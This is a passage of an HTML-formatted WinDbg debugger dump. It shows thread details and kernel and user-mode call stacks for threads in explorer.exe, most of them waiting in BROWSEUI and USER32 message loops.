/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fd64 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142fe00 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fe5c 77d4bcad USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #fbfbfb"> 0142fe78 75f843c1 USER32!MsgWaitForMultipleObjects+0x1f (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fed0 75f84871 BROWSEUI!CACThread::_ThreadLoop+0xd4 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142fee0 77f68ea5 BROWSEUI!CACThread::_ThreadProc+0x1c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fef8 7c927545 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142ff40 7c927583 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142ff60 7c927645 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142ff74 7c92761c ntdll!RtlpApcCallout+0x11 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142ffb4 7c80b50b ntdll!RtlpWorkerThread+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: 
#ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 821e5020 Cid 0594.038c Teb: 7ffd9000 Win32Thread: e35f88a0 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8218f960 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 828d4690 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 6516 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: 
consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:03.718<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:08.625<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b2b70c80 Current b2b705dc Base b2b71000 Limit b2b6b000 <span style="color: #0000ff">Call</span> b2b70c80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b705f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b70600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b70638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre 
style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b709c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b709c8 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2b709e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fb48 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 
100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b70c98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b70cf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. 
Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b70d5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b70d5c 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2b70d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3ff28 75faea19 USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3ffb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 821bd020 Cid 0594.0214 Teb: 7ffa5000 Win32Thread: e2cbaa28 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 826b6870 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82868198 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 4265 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:01.875<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:03.203<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b1f4ac80 Current b1f4a5dc Base b1f4b000 Limit b1f47000 <span style="color: #0000ff">Call</span> b1f4ac80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4a5f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4a600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4a638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4a9c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4a9c8 7c90eb94 
nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f4a9e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fb48 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 
(FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4ac98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4acf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4ad5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4ad5c 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f4ad64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239ff28 75faea19 USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239ffb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre 
style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 821b4788 Cid 0594.07d0 Teb: 7ffa6000 Win32Thread: e32efc00 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 824bf510 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8211b150 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> IRP List:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82829d38: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning 
Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696274 Ticks: 519 (0:00:00:08.109)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 14267 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:06.234<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:13.843<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b1f2ac80 Current b1f2a5dc Base b1f2b000 Limit b1f25000 <span style="color: #0000ff">Call</span> b1f2ac80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: 
#fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2a5f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2a600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2a638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2a9c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2a9c8 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f2a9e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fb48 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br 
/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2ac98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2acf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. 
Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2ad5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2ad5c 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f2ad64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219ff28 75faea19 USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219ffb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 8222eba0 Cid 0594.0218 Teb: 7ffd5000 Win32Thread: e166b8c0 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
